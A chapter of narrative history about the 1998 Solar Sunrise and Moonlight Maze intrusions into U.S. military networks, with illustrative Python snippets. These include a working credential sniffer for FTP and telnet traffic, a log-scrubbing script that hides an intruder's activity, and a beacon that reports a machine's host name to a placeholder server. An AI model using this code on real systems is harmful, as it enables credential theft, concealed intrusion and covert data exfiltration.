On February 3, 1998, the network monitors at the Air Force Information Warfare Center in San Antonio sounded the alarm: someone was hacking into a National Guard computer at Andrews Air Force Base on the outskirts of Washington, D.C.
Within twenty-four hours, the center’s Computer Emergency Response Team, probing the networks more deeply, detected intrusions at three other bases. Tracing the hacker’s moves, the team found that he’d broken into the network through an MIT computer server. Once inside the military sites, he installed a “packet sniffer,” which collected usernames and passwords as they crossed the network, allowing him to roam the entire network. He then created a back door, which let him enter and exit the site at will, downloading, erasing, or distorting whatever data he wished.
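To make the mechanics concrete: a packet sniffer passively copies traffic off the network and watches for credentials sent in the clear, as telnet and FTP logins typically were in 1998. Below is a minimal sketch in Python using the scapy library; the keyword list and the plaintext-protocol assumption are illustrative, not a reconstruction of the intruder’s actual tool.

```python
# Minimal credential-sniffer sketch (illustrative only).
# Assumes plaintext protocols such as telnet/FTP, common on 1998-era networks.
# Requires root privileges and the third-party scapy library.
from scapy.all import sniff, TCP, Raw

KEYWORDS = (b"USER", b"PASS", b"login:", b"Password:")

def harvest(pkt):
    """Print any packet payload that looks like part of a login exchange."""
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = pkt[Raw].load
        if any(k in payload for k in KEYWORDS):
            print(pkt[TCP].sport, "->", pkt[TCP].dport, payload[:80])

# Watch FTP (port 21) and telnet (port 23) traffic on the local segment.
sniff(filter="tcp port 21 or tcp port 23", prn=harvest, store=False)
```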
The hacker was able to do all this because of a well-known vulnerability in a widely used UNIX operating system. The computer specialists in San Antonio had been warning senior officers of this vulnerability—Ken Minihan had personally repeated these warnings to generals in the Pentagon—but no one paid attention.
When President Clinton signed the executive order on “Critical Infrastructure Protection,” back in July 1996, one consequence was the formation of the Marsh Commission, but another—less noticed at the time—was the creation of the Infrastructure Protection Task Force inside the Justice Department, to include personnel from the FBI, the Pentagon (the Joint Staff and the Defense Information Systems Agency), and, of course, the National Security Agency.
By February 6, three days after the intrusion at Andrews Air Force Base was spotted, this task force was on the case, with computer forensics handled by analysts at NSA, DISA, and a unit in the Joint Staff called the Information Operations Response Cell, which had been set up just a week earlier as a result of Eligible Receiver. They found that the hacker had exploited a specific vulnerability in versions 2.4 and 2.6 of Sun’s Solaris operating system, a widely used UNIX variant. And so, the task force code-named its investigation Solar Sunrise.
John Hamre, the deputy secretary of defense who’d seen the Eligible Receiver exercise eight months earlier as the wake-up call to a new kind of threat, now saw Solar Sunrise as the threat’s fulfillment. Briefing President Clinton on the intrusion, Hamre warned that Solar Sunrise might be “the first shots of a genuine cyber war,” adding that they may have been fired by Iraq.
It wasn’t a half-baked suspicion. Saddam Hussein had recently expelled United Nations inspectors who’d been in Iraq for six years to ensure his compliance with the peace terms that ended Operation Desert Storm—especially the clause that barred him from developing weapons of mass destruction. Many feared that Saddam’s ouster of the inspectors was the prelude to resuming his WMD program. Clinton had ordered his generals to plan for military action; a second aircraft carrier was steaming to the Persian Gulf; American troops were prepared for possible deployment.
So when the Solar Sunrise hack expanded to more than a dozen military bases, it struck some, especially inside the Joint Staff, as a pattern. The targets included bases in Charleston, Norfolk, Dover, and Hawaii—key deployment centers for U.S. armed forces. Only unclassified servers were hacked, but some of the military’s vital support elements—transportation, logistics, medical teams, and the defense finance system—ran on unclassified networks. If the hacker corrupted or shut down these networks, he could impede, maybe block, an American military response.
Then came another unsettling report: NSA and DISA forensics analysts traced the hacker’s path to an address on Emirnet, an Internet service provider in the United Arab Emirates—lending weight to fears that Saddam, or some proxy in the region, might be behind the attacks.
The FBI’s national intelligence director sent a cable to all his field agents, citing “concern that the intrusions may be related to current U.S. military actions in the Persian Gulf.” At Fort Meade, Ken Minihan came down firmer still, telling aides that the hacker seemed to be “a Middle Eastern entity.”
Some were skeptical. Neal Pollard, a young DISA consultant who’d studied cryptology and international relations in college, was planning a follow-on exercise to Eligible Receiver when Solar Sunrise, a real attack, took everyone by surprise. As the intrusions spread, Pollard downloaded the logs, drafted briefings, tried to figure out the hacker’s intentions—and, the more he examined the data, the more he doubted that this was the work of serious bad guys.
In the exercise that he’d been planning, a Red Team was going to penetrate an unclassified military network, find a way into its classified network (which, Pollard knew from advance probing, wasn’t very secure), hop on it, and crash it. By contrast, the Solar Sunrise hacker wasn’t doing anything remotely as elaborate: this guy would poke around briefly in one unclassified system after another, then get out, leaving behind no malware, no back door, nothing. And while some of the servers he attacked were precisely where a hacker would go to undermine the network of a military on the verge of deployment, most of the targets seemed selected at random, bearing no significance whatever.
Still, an international crisis was brewing, war might be in the offing; so worst-case assumptions came naturally. Whatever the hacker’s identity or motive, his work was throwing commanders off balance. They remembered Eligible Receiver, when they didn’t know they’d been hacked; the NSA Red Team had fed some of them false messages, which they’d assumed were real. This time around, they knew they were being hacked, and it wasn’t a game. They didn’t detect any damage, but how could they be sure? When they read a message or looked at a screen, could they trust—should they trust—what they were seeing?
This was the desired effect of what Perry had called counter command-control warfare: just knowing that you’d been hacked, regardless of the hack’s tangible effects, was disorienting and disruptive.
Meanwhile, the Justice Department task force was tracking the hacker twenty-four hours a day. It was a laborious process. The hacker was hopping from one server to another to obscure his identity and origins; the NSA had to report all these hops to the FBI, which took a day or so to investigate each report. At this point, no one knew whether Emirnet, the Internet service provider in the United Arab Emirates, was the source of the attacks or simply one of several landing points along the hacker’s hops.
Some analysts in the Joint Staff’s new Information Operations Response Cell noticed one pattern in the intrusions: they all took place between six and eleven o’clock at night, East Coast time. The analysts calculated what time it might be where the hacker was working: he might, it turned out, be on the overnight shift in Baghdad or Moscow, or maybe the early morning shift in Beijing.
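The arithmetic behind that guess is simple offset math, which can be checked with Python’s standard zoneinfo module (the IANA zone names below are the modern equivalents of the zones the analysts would have consulted):

```python
from datetime import datetime
from zoneinfo import ZoneInfo  # standard library in Python 3.9+

# The intrusions clustered between 6 and 11 p.m. East Coast time.
for hour in (18, 23):
    et = datetime(1998, 2, 6, hour, tzinfo=ZoneInfo("America/New_York"))
    for city, zone in [("Baghdad", "Asia/Baghdad"),
                       ("Moscow", "Europe/Moscow"),
                       ("Beijing", "Asia/Shanghai")]:
        local = et.astimezone(ZoneInfo(zone))
        print(f"{et:%H:%M} ET = {local:%H:%M} in {city}")
```

The window works out to roughly 2 a.m. to 7 a.m. in Baghdad and Moscow, and 7 a.m. to noon in Beijing, hence the overnight and early-morning shift theories.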
One possibility they didn’t bother to consider: it was also after-school time in California.
By February 10, after just four days of sleuthing, the task force found the culprits. They weren’t Iraqis or “Middle Eastern entities” of any tribe or nationality. They were a pair of sixteen-year-old boys in the San Francisco suburbs, malicious descendants of the Matthew Broderick character in WarGames, hacking the Net under the usernames Makaveli and Stimpy, who’d been competing with their friends to hack into the Pentagon the fastest.
In one day’s time, FBI agents obtained authority from a judge to run a wiretap. They took the warrant to Sonic.net, the service provider the boys were using, and started tracking every keystroke the boys typed, from the instant they logged on through the phone line of Stimpy’s parents. Physical surveillance teams confirmed that the boys were in the house—eyewitness evidence of their involvement, in case a defense lawyer later claimed that the boys were blameless and that someone else must have hacked into their server.
Through the wiretap, the agents learned that the boys were getting help from an eighteen-year-old Israeli, an already notorious hacker named Ehud Tenenbaum, who called himself The Analyzer. All three teenagers were brazen—and stupid. The Analyzer was so confident in his prowess that, during an interview with an online forum called AntiOnline (which the FBI was monitoring), he gave a live demonstration of hacking into a military network. He also announced that he was training the two boys in California because he was “going to retire” and needed successors. Makaveli gave an interview, too, explaining his own motive. “It’s power, dude,” he typed out. “You know, power.”
The Justice Department task force was set to let the boys hang themselves a bit longer, but on February 25, John Hamre spoke to reporters at a press breakfast in Washington, D.C. Still frustrated with the military’s inaction on the broader cyber threat, he outlined the basic facts of Solar Sunrise (which, until then, had been kept secret), calling it “the most organized and systematic attack” on American defense systems to date. And he disclosed that the suspects were two teenagers in Northern California.
At that point, the FBI had to scramble before the boys heard about Hamre’s remarks and erased their files. Agents quickly obtained a search warrant and entered Stimpy’s house. There he was, in his bedroom, sitting at a computer, surrounded by empty Pepsi cans and half-eaten cheeseburgers. The agents arrested the boys while carting off the computer and several floppy disks.
Stimpy and Makaveli (whose real names were kept under seal, since they were juveniles) were sentenced to three years’ probation and a hundred hours of community service; they were also barred from going on the Internet without adult supervision. Israeli police arrested Tenenbaum and four of his apprentices, who were all twenty years old; he served eight months in prison, after which he started an information security firm, then moved to Canada, where he was arrested for hacking into financial sites and stealing credit card numbers.
At first, some U.S. officials were relieved that the Solar Sunrise hackers turned out to be just a couple of kids—or, as one FBI official put it in a memo, “not more than the typical hack du jour.” But most officials took that as the opposite of reassurance: if a couple of kids could pull this off, what could a well-funded, hostile nation-state do?
They were about to find out.
In early March, just as officials at NSA, DISA, and the Joint Staff’s Information Operations Response Cell were closing their case files on Solar Sunrise and going back to their workaday tasks, word came through that someone had hacked into the computers at Wright-Patterson Air Force Base, in Ohio, and was pilfering files—unclassified but sensitive—on cockpit design and microchip schematics.
Over the next few months, the hacker fanned out to other military facilities. No one knew his location (the hopping from one site to another was prodigious, swift, and global); his searches bore no clear pattern (except that they involved high-profile military R&D projects). The operation was a sequel of sorts to Solar Sunrise, though more elaborate and puzzling; so, just as night follows day, the task force called it Moonlight Maze.
Like the Solar Sunrise gang, this hacker would log in to the computers of university research labs to gain access to military sites and networks. But in other ways, he didn’t seem at all like some mischievous kid on a cyber joyride. He didn’t dart in and out of a site; he was persistent; he was looking for specific information; he seemed to know where to find it; and, if his first path was blocked, he stayed inside the network, prowling for other approaches.
He was also remarkably sophisticated, employing techniques that impressed even the NSA teams that were following his moves. He would log on to a site, using a stolen username and password; when he left, he would rewrite the log so that no one would know he’d ever been there. Finding the hacker was touch-and-go: the analysts would have to catch him in the act and track his moves in real time; even then, since he erased the logs when exiting, the on-screen evidence would vanish after the fact. It took a while to convince some higher-ups that there had been an intrusion.
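Rewriting a log to hide a visit can be conceptually simple, even if doing it without leaving traces is not: strip out every line that mentions the intruder’s session before disconnecting. A schematic sketch, with a hypothetical log path and an example address:

```python
# Schematic log-scrubbing sketch (hypothetical log format and path).
# An intruder with write access to the log removes every line that
# mentions his own session before disconnecting.
INTRUDER_ADDR = "192.0.2.7"   # example address (RFC 5737 test range)
LOGFILE = "/var/log/messages"

with open(LOGFILE) as f:
    lines = f.readlines()

# Keep only the lines that don't mention the intruder's address.
scrubbed = [line for line in lines if INTRUDER_ADDR not in line]

with open(LOGFILE, "w") as f:
    f.writelines(scrubbed)
```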
A year earlier, the analysts probably wouldn’t have detected a hacker at all, unless by pure chance. About a quarter of the servers in the Air Force were wired to the network security monitors in San Antonio; but most of the Army, Navy, and civilian leaders in the Pentagon would have had no way of knowing whether an intruder was present, much less what he was doing or where he was from.
That all changed with the one-two-three punch of Eligible Receiver, the Marsh Commission Report, and Solar Sunrise—which, over a mere eight-month span, from June 1997 to February 1998, convinced high-level officials, even those who had never thought about the issue, that America was vulnerable to a cyber attack and that this condition endangered not only society’s critical infrastructure but also the military’s ability to act in a crisis.
Right after Eligible Receiver, John Hamre called a meeting of senior civilians and officers in the Pentagon to ask what could be done. One solution, a fairly easy gap-filler, was to authorize an emergency purchase of devices known as intrusion-detection systems, or IDS—a company in Atlanta, Georgia, called Internet Security Systems, could churn them out in quantity—and to install them on more than a hundred Defense Department computers. As a result, when Solar Sunrise and Moonlight Maze erupted, far more Pentagon personnel saw what was happening, far more quickly, than they otherwise would have.
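An IDS of that era was, at its core, a pattern matcher scanning traffic or logs for known attack signatures. Here is a minimal sketch of the log-watching variety; the signatures and log path are illustrative, and this is not a representation of the Internet Security Systems product:

```python
# Minimal signature-based intrusion-detection sketch (illustrative;
# not the Internet Security Systems product, whose internals differ).
import re

SIGNATURES = {
    "Solaris statd exploit attempt": re.compile(r"rpc\.statd"),
    "repeated failed logins": re.compile(r"authentication failure"),
}

def scan_line(line: str):
    """Raise an alert for any line matching a known attack signature."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(line):
            print(f"ALERT: {name}: {line.strip()}")

with open("/var/log/auth.log") as log:   # hypothetical log path
    for line in log:
        scan_line(line)
```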
Not everyone got the message. After Eligible Receiver, Matt Devost, who’d led the aggressor team in war games testing the vulnerability of American and allied command-control systems, was sent to Hawaii to clean up the networks at U.S. Pacific Command headquarters, which the NSA Red Team had devastated. Devost found gaps and sloppiness everywhere. In many cases, software vendors had long ago issued warnings about the vulnerabilities along with patches to fix them; the user had simply to push a button, but no one at PacCom had done even that. Devost lectured the admirals, all of them more than twice his age. This wasn’t rocket science, he said. Just put someone in charge and order him to install the repairs. When Solar Sunrise erupted, Devost was working computer forensics at the Defense Information Systems Agency. He came across PacCom’s logs and saw that they still hadn’t fixed their problems: despite his strenuous efforts, nothing had changed. (He decided at that point to quit government and do computer-attack simulations in the private sector.)
Even some of the officers who’d made the changes, and installed the devices, didn’t understand what they were doing. Six months after the order went out to put intrusion-detection systems on Defense Department computers (still a few weeks before Solar Sunrise), Hamre called a meeting to see how the devices were working.
An Army one-star general furrowed his brow and grumbled that he didn’t know about these IDS things: ever since he’d put them on his computers, they were getting attacked every day.
The others at the table suppressed their laughter. The general didn’t realize that his computers might have been getting hacked every day for months, maybe years; all the IDS had done was to let him know it.
Early on in Solar Sunrise, Hamre called another meeting, charged with the same urgency as the one he’d called in the wake of Eligible Receiver, and asked the officers around him the same question he’d asked before: “Who’s in charge?”
They all looked down at their shoes or their notepads because, in fact, nothing had changed; still, no one was in charge. The IDS devices may have been in place, but no one had issued protocols on what to do if the alarm went off or how to distinguish an annoying prank from a serious attack.
Finally, Brigadier General John “Soup” Campbell, the commander of the secret J-39 unit, who’d been the Joint Staff’s point man on Eligible Receiver, raised his hand. “I’m in charge,” he said, though he had no idea what that might mean.
By the time Moonlight Maze started wreaking havoc, Campbell was drawing up plans for a new office called Joint Task Force-Computer Network Defense—or JTF-CND. Orders to create the task force had been signed July 23, and it had commenced operations on December 10. It was staffed with just twenty-three officers, a mix of computer specialists and conventional weapons operators who had to take a crash course on the subject, all crammed into a trailer behind DISA headquarters in the Virginia suburbs, not far from the Pentagon. It was an absurdly modest effort for an outfit that, according to its charter, would be “responsible for coordinating and directing the defense of DoD computer systems and computer networks,” including “the coordination of DoD defensive actions” with other “government agencies and appropriate private organizations.”
Campbell’s first steps would later seem elementary, but no one had ever taken them—few had thought of them—on such a large scale. He set up a 24/7 watch center, established protocols for alerting higher officials and combatant commands of a cyber intrusion, and—the very first step—sent out a communiqué, on his own authority, advising all Defense Department officials to change their computer passwords.
By that point, Moonlight Maze had been going on for several months, and the intruder’s intentions and origins were still puzzling. Most of the intrusions, at least the ones that were noticed, took place in the same nine-hour span. Just as they’d done during Solar Sunrise, some intelligence analysts in the Pentagon and the FBI looked at a time zone map, did the math, and guessed that the attacker must be in Moscow. Others, in the NSA, noted that Tehran was in a nearby time zone and made a case for Iran as the hacker’s home.
Meanwhile, the FBI was probing all leads. The hacker had hopped through the computers of more than a dozen universities—the University of Cincinnati, Harvard, Bryn Mawr, Duke, Pittsburgh, Auburn, among others—and the bureau sent agents to interview students, tech workers, and faculty on each campus. A few intriguing suspects were tagged here and there—an IT aide who answered questions nervously, a student with a Ukrainian boyfriend—but none of the leads panned out. The colleges weren’t the source of the hack; like the Lawrence Berkeley computer center in Cliff Stoll’s The Cuckoo’s Egg, they were merely convenient transit points from one target site to another.
Finally, three breakthroughs occurred independently. One was inspired by Stoll’s book. Stoll had captured the West German hacker a dozen years earlier by creating a “honey pot”—a set of phony files, replete with directories, documents, usernames, and passwords (all of Stoll’s invention), seemingly related to the American missile-defense program, a subject of particular interest to the hacker. Once lured to the pot, he stayed in place long enough for the authorities to trace his movements and track him down. The interagency intelligence group in charge of solving Moonlight Maze—mainly NSA analysts working under CIA auspices—decided to do what Stoll had done: they created a honey pot, in this case a phony website of an American stealth aircraft program, which they figured might lure their hacker. (Everyone in the cyber field was enamored of The Cuckoo’s Egg; when Stoll, a long-haired Berkeley hippie, came to give a speech at NSA headquarters not long after his book was published, he received a hero’s welcome.) Just as in Stoll’s scheme, the hacker took the bait.
But with their special access to exotic tools, the NSA analysts took Stoll’s trick a step further. When the hacker left the site, he unwittingly took with him a digital beacon—a few lines of code, attached to the data packet, which sent back a signal that the analysts could follow as it piggybacked through cyberspace. The beacon was an experimental prototype; sometimes it worked, sometimes it didn’t. But it worked well enough for them to trace the hacker to an IP address of the Russian Academy of Sciences, in Moscow.
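The beacon’s actual design has never been made public; the underlying idea, though, is code that rides along with exfiltrated data and reports back when it lands somewhere. A toy illustration, with a placeholder callback server:

```python
# Toy "beacon" illustration (not the actual NSA tool, whose design
# is not public). The idea: code riding along with stolen data
# reports back from whatever machine opens it.
import socket

CALLBACK_HOST = "collector.example.net"   # placeholder analyst-run server
CALLBACK_PORT = 8443                      # placeholder port

def phone_home():
    """Send a short 'I was opened here' signal back to the analysts."""
    try:
        with socket.create_connection((CALLBACK_HOST, CALLBACK_PORT),
                                      timeout=5) as s:
            s.sendall(socket.gethostname().encode())
    except OSError:
        pass  # like the 1999 prototype: sometimes it worked, sometimes not

phone_home()
```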
Some intelligence analysts, including at NSA, remained skeptical, arguing that the Moscow address was just another hopping point along the way to the hacker’s real home in Iran.
Then came the second breakthrough. While Soup Campbell was setting up Joint Task Force-Computer Network Defense, he hired a naval intelligence officer named Robert Gourley to be its intel chief. Gourley was a hard-driving analyst with a background in computer science. In the waning days of the Cold War, he’d worked in a unit that fused intelligence and operations to track, and aggressively chase, Russian submarines. He’d learned of this fusion approach, five years earlier, at an officers’ midcareer course taught by Bill Studeman and Rich Haver—the intelligence veterans who, a decade earlier, under the tutelage of Admiral Bobby Ray Inman, had pushed for the adoption of counter command-control warfare.
Shortly before joining Campbell’s task force, Gourley attended another conference, this one lasting just a day, on Navy operations and intelligence. Studeman and Haver happened to be among the lecturers. Gourley went up to them afterward to renew his acquaintance. A few weeks later, ensconced in his task force office, he phoned Haver on a secure line, laid out the Moonlight Maze problem, as well as the debate over the intruder’s identity, and asked if he had advice on how to resolve it.
Haver recalled that, during the Cold War, the KGB or GRU, the Soviet military’s spy agency, often dispatched scientists to international conferences to collect papers on topics of interest. So Gourley assembled a small team of analysts from the various intelligence agencies and scoured the logs of Moonlight Maze to see what topics interested this hacker. The swath, it turned out, covered a bizarrely wide range: not just aeronautics (the topic of his first search, at Wright-Patterson) but also hydrodynamics, oceanography, the altimeter data of geophysical satellites, and a lot of technology related to surveillance imagery. Gourley’s team then scanned databanks of recent scientific conferences. The matchup was at least intriguing: Russian scientists had attended conferences on every topic that attracted the hacker.
That, plus the evidence from the honey pot and the absence of signs pointing to Iran or any other Middle Eastern source, led Gourley to conclude that the culprit was Russia. It was a striking charge: a nation-state was hacking American military networks—and not just any nation-state, but America’s former enemy and now, supposedly, post–Cold War partner.
Gourley brought his finding to Campbell, who was shocked. “Are you saying that we’re under attack?” he asked. “Should we declare war?”
“No, no,” Gourley replied. This was an intelligence assessment, though he added that he had “high confidence” in its accuracy.
The third intelligence breakthrough was the firmest but also the newest, the one that relied on methods unique to the cyber age and thus mastered by only a few fledgling specialists. Kevin Mandia was part of a small cyber crime team at the Air Force Office of Special Investigations. He’d visited the Air Force Information Warfare Center in San Antonio several times and had kept up with its network security monitoring system. When Moonlight Maze got started, Mandia, by now a private contractor, was sent to the FBI task force to review the hacker’s logs. The hacker was using an obfuscated code; Mandia and his team wrote new software to decrypt the commands—and it turned out they’d been typed in Cyrillic. Mandia concluded that the hacker was Russian.I
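The decoding itself was the hard part; once the commands were readable, recognizing Cyrillic is mechanical, since in modern text handling Cyrillic letters occupy their own Unicode block (logs of that era would have used an encoding such as KOI8-R, but the principle is the same). A sketch of that final check:

```python
def looks_cyrillic(text: str, threshold: float = 0.3) -> bool:
    """Return True if a meaningful share of the letters are Cyrillic.

    Cyrillic occupies the Unicode block U+0400 through U+04FF.
    """
    letters = [c for c in text if c.isalpha()]
    if not letters:
        return False
    cyrillic = sum(1 for c in letters if "\u0400" <= c <= "\u04ff")
    return cyrillic / len(letters) >= threshold

# A decoded command string containing Russian words ("copy files"):
print(looks_cyrillic("скопировать файлы"))   # True
print(looks_cyrillic("copy files"))          # False
```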
For the first several months of Moonlight Maze, the American intelligence agencies stopped short of making any statement, even informally, about the hacker’s origins. But the convergence of the Stoll-inspired honey pot, Bob Gourley’s analysis, and Kevin Mandia’s decryption—the fact that such disparate methods produced the same conclusion—changed the picture. It was also clear by now that the Moonlight Maze hackers, whoever they were, had pulled in quite a haul: 5.5 gigabytes of data, the equivalent of nearly three million sheets of paper. None of it was classified, but quite a lot of it was sensitive—and might add up to classified information if a smart analyst pieced it all together.
For nearly a year, an FBI-led task force—the same interagency task force that investigated Solar Sunrise—had coordinated the interagency probe, sharing all intelligence and briefing the White House. In February, John Hamre testified on the matter in closed hearings. Days later, the news leaked to the press, including the finding that the hackers were Russian.
At that point, some members of the task force, especially those from the FBI, proposed sending a delegation to Moscow and confronting Russian officials head-on. It might turn out that they had nothing to do with the hacking (Hamre had testified that it was unclear whether the hackers were working in the government), in which case the Kremlin and the security ministries would want to know about the renegade in their midst. Or maybe the Russian government was involved, in which case that would be worth knowing, too.
Task force members from the Pentagon and NSA were leery about going public. Maybe the Russians hadn’t read the news stories, or maybe they had but dismissed the reports as untrue; in other words, maybe the Russians still didn’t know we were on to them, that we were hacking their hacker. Meanwhile, we were learning things about their interests and operational style; an official confrontation could blow the operation.
In the end, the White House approved the FBI’s request to send a delegation. The task force then spent weeks discussing what evidence to let the Russians see and what evidence to withhold. In any case, it would be presented to the Russians in the same terms as the FBI officially approached it—not as a matter of national security or diplomacy, but rather as a criminal investigation, in which the United States was seeking assistance from the Russian Federation.
The delegation, formally called the Moonlight Maze Coordination Group, consisted of four FBI officials—a field agent from the Baltimore office, two linguists from San Francisco, and a supervisor from headquarters—as well as a NASA scientist and two officers from the Air Force Office of Special Investigations, who had examined the hacker’s logs with Kevin Mandia. They flew to Moscow on April 2, bringing along the files from five of the cyber intrusions, with plans to stay for eight days.
This was the era of warm relations between Bill Clinton and Russia’s reform president, Boris Yeltsin, so the group was received in a spirit of celebration, its first day in Moscow filled with toasts, vodka, caviar, and good cheer. They spent the second day at the headquarters of the Russian defense ministry in a solid working session. The Russian general who served as the group’s liaison was particularly cooperative. He brought out the Russian logs on the files that the Americans had brought with them. This was confirmation: the hacking had come from Russia, through the servers of the academy of sciences. The general was embarrassed, putting the blame on “those motherfuckers in intelligence.”
As a test, to see whether this might be a setup, one of the Air Force investigators on the trip mentioned a sixth intrusion, one whose files the group hadn’t brought with them. The general brought out those logs, too. This is criminal activity, he bellowed to his new American friends. We don’t tolerate this.
The Americans were pleased. This was working out extraordinarily well; maybe the whole business could be resolved through quiet diplomacy and a new spirit of cooperation.
On the third day, things took a shaky turn. Suddenly, the group’s escorts announced that it would be a day of sightseeing. So was the fourth day. On the fifth day, no events were scheduled at all. The Americans politely protested, to no avail. They never again set foot inside the Russian defense ministry. They never again heard from the helpful general.
As they prepared to head back to the States, on April 10, a Russian officer assured them that his colleagues had launched a vigorous investigation and would soon send the embassy a letter outlining their findings.
For the next few weeks, the legal attaché in the American embassy phoned the Russian defense ministry almost every day, asking if the letter had been written. He was politely asked to be patient. No letter ever arrived. And the helpful general seemed to have vanished.
Back in Washington, a task force member cautioned against drawing sour conclusions. Maybe, he said, the general was just sick.
Some members from the Pentagon and the intelligence agencies, who’d warned against the trip, rolled their eyes. “Yeah,” Bob Gourley scoffed, “maybe he has a case of lead poisoning.”
The emerging consensus was that the general hadn’t known about the hacking operation, that he’d genuinely believed some recalcitrant agents in military intelligence were engaged in skullduggery—until his superiors excoriated him, possibly fired him or worse, for sharing secrets with the Americans.
One good thing came out of the trip: the hacking did seem to stop.
Then, two months later, Soup Campbell’s Joint Task Force-Computer Network Defense detected another round of hacking into sensitive military servers—these intrusions bearing a slightly different signature, layered with codes that were harder to break.
The cat-and-mouse game was back on. And it was a game that both sides, and soon other nations, were playing. To an extent known by only a few American officers, still fewer political higher-ups, and no doubt some Russian spies, too, the American cyber warriors were playing offense as well as defense—and had been for a long while.
I. In 2006, Mandia would form a company called Mandiant, which would emerge as one of the leading cyber security incident-response firms, rising to prominence in 2013 as the firm that identified a special unit of the Chinese army as the hacker behind hundreds of cyber attacks against Western corporations.